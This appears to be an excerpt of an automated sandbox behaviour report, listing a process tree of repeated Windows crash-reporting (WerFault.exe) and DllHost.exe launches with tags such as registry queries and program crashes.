-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 1036 -ip 10362⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4580 -ip 45802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 5116 -ip 51162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4868 -ip 48682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 848 -ip 8482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 4824 -ip 48242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 2872 -ip 28722⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 2044 -ip 20442⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4208 -ip 42082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 2460 -ip 24602⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 3700 -ip 37002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 3060 -ip 30602⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 1784 -ip 17842⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 1956 -ip 19562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 4812 -ip 48122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 2640 -ip 26402⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 2968 -ip 29682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 4804 -ip 48042⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 5116 -ip 51162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 5012 -ip 50122⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 2412 -ip 24122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3816 -ip 38162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 2328 -ip 23282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4192 -ip 41922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4968 -ip 49682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4040 -ip 40402⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 4948 -ip 49482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 3148 -ip 31482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4072 -ip 40722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 4384 -ip 43842⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 620 -p 2612 -ip 26122⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 2908 -ip 29082⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 352 -ip 3522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 3180 -ip 31802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 2040 -ip 20402⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 1100 -ip 11002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 620 -p 2264 -ip 22642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 2916 -ip 29162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 3940 -ip 39402⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 656 -ip 6562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 756 -ip 7562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 1320 -ip 13202⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 4128 -ip 41282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 1348 -ip 13482⤵
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 3148 -ip 31482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 1232 -ip 12322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 1560 -ip 15602⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 3896 -ip 38962⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4224 -ip 42242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 2256 -ip 22562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 5116 -ip 51162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 4572 -ip 45722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 2044 -ip 20442⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 628 -p 2776 -ip 27762⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 4200 -ip 42002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 3948 -ip 39482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 1404 -ip 14042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4576 -ip 45762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 1956 -ip 19562⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 3892 -ip 38922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 3552 -ip 35522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 2572 -ip 25722⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4256 -s 6602⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3828 -s 3682⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1372 -s 4842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3980 -s 3642⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4700 -s 4842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1232 -s 4722⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4228 -s 4682⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3596 -s 5002⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4120 -s 4682⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4856 -s 6562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4948 -s 3882⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3372 -s 4802⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4944 -s 3842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4716 -s 4922⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 636 -s 4921⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3408 -s 2282⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3028 -s 3841⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1708 -s 4282⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4480 -s 4802⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5012 -s 4001⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3652 -s 4201⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4780 -s 4241⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2588 -s 4002⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4564 -s 6521⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2276 -s 6562⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2264 -s 4001⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 772 -s 4002⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 432 -s 7922⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2016 -s 6802⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5116 -s 7641⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2632 -s 6482⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5004 -s 7882⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 224 -s 6562⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4792 -s 3881⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1528 -s 4202⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3520 -s 4882⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1036 -s 7922⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4580 -s 6642⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5116 -s 8121⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4868 -s 2442⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 848 -s 7721⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4824 -s 6482⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2872 -s 8002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4208 -s 7802⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2044 -s 4961⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2460 -s 6642⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3700 -s 4842⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3060 -s 4762⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1784 -s 7722⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4812 -s 7202⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1956 -s 6881⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2640 -s 4762⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2968 -s 4922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4804 -s 6882⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5116 -s 5081⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5012 -s 4002⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2412 -s 7242⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3816 -s 4002⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2328 -s 7201⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4192 -s 4682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4968 -s 7682⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4948 -s 6562⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4040 -s 4002⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3148 -s 3882⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4072 -s 6801⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2612 -s 6842⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4384 -s 4881⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2908 -s 4002⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 352 -s 6922⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3180 -s 4682⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2040 -s 4922⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1100 -s 4922⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2264 -s 4922⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2916 -s 6642⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3940 -s 4722⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 756 -s 4122⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exe -u -p 656 -s 656
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  - Modifies registry class
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 1320 -s 420
    - Checks processor information in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 4128 -s 420
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  - Suspicious use of NtCreateProcessExOtherParentProcess
  C:\Windows\system32\WerFault.exe -u -p 1348 -s 488
    - Checks processor information in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 3148 -s 788
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 1232 -s 680
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 1560 -s 780
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3896 -s 420
    - Checks processor information in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 4224 -s 816
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 2256 -s 680
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 5116 -s 724
    - Checks processor information in registry
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 4572 -s 680
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 2044 -s 772
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  - Checks processor information in registry
  C:\Windows\system32\WerFault.exe -u -p 2776 -s 452
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 4200 -s 776
    - Enumerates system info in registry
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
  C:\Windows\system32\WerFault.exe -u -p 3948 -s 656
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe -u -p 1404 -s 724
    - Checks processor information in registry
    - Enumerates system info in registry
